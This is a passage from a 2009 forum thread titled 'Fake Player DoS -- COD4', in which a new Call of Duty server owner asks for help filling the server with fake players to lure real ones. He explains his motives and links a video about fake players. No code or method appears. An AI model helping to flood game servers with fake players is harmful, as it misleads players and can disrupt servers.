I see. Well I do have my own server, so I do have admin powers, but now that I know that you had COD5, I wish I actually looked into this before the guy discontinued his server so you would know what I was talking about. My problem is that i'm a complete novice having my own server, but i finally got the basics down. Now I just need people in it :P But yes, from what people have been telling me, its possible is a mod, but I have no clue where to find it. I've searched google practically all day yesterday and today with a few exception of breaks of course. Any clue as to how I may find it? Sorry to kind of go off-topic on your thread, but I thought this might be what I was looking for!

Sorry again!


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 08 Jan 2009 05:55 

Joined: 07 Jan 2009 23:19
Posts: 13
You can be a really really really be super helpful to me if you can somehow figure this out with me! lol Motivation to help someone! haha. I'm really itching to get this going. I wish I didn't even need to do this, but the server that I played on, I really enjoyed playing in it. Basically the only server I played on, and now its gone. Tried playing in some other servers that have decent ping for me but I just didn't like the configs, so I decided to rent one out on the spot without realizing how hard it was to get people to join without this! Now that I thought about it, it's pretty much a waste of money for a idling server. I asked the person that was running the server if he could populate my server with what he did with his server, but he said no because he didn't like the company that bought the server from, which was the cheapest, so easy decision for me, and because its not what he wants to play, which is hardcore team deathmatch, exactly how his server was. So this kind of bugged me, so I tried to do figure it out on my own, and ran into a major problem, I don't know a clue what this is, or how to do it. :P Well, thats my story. Hope you get motivated! ;) lol


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 08 Jan 2009 08:53 

Joined: 07 Jan 2009 23:19
Posts: 13
As I was doing more research, I found this!

http://www.noobflicks.com/watch/3977/fa ... f2_servers

This is actually the exact clan server I was playing in, but for COD5.


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 121 posts ]  Go to page 1, 2, 3, 4, 5  Next

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: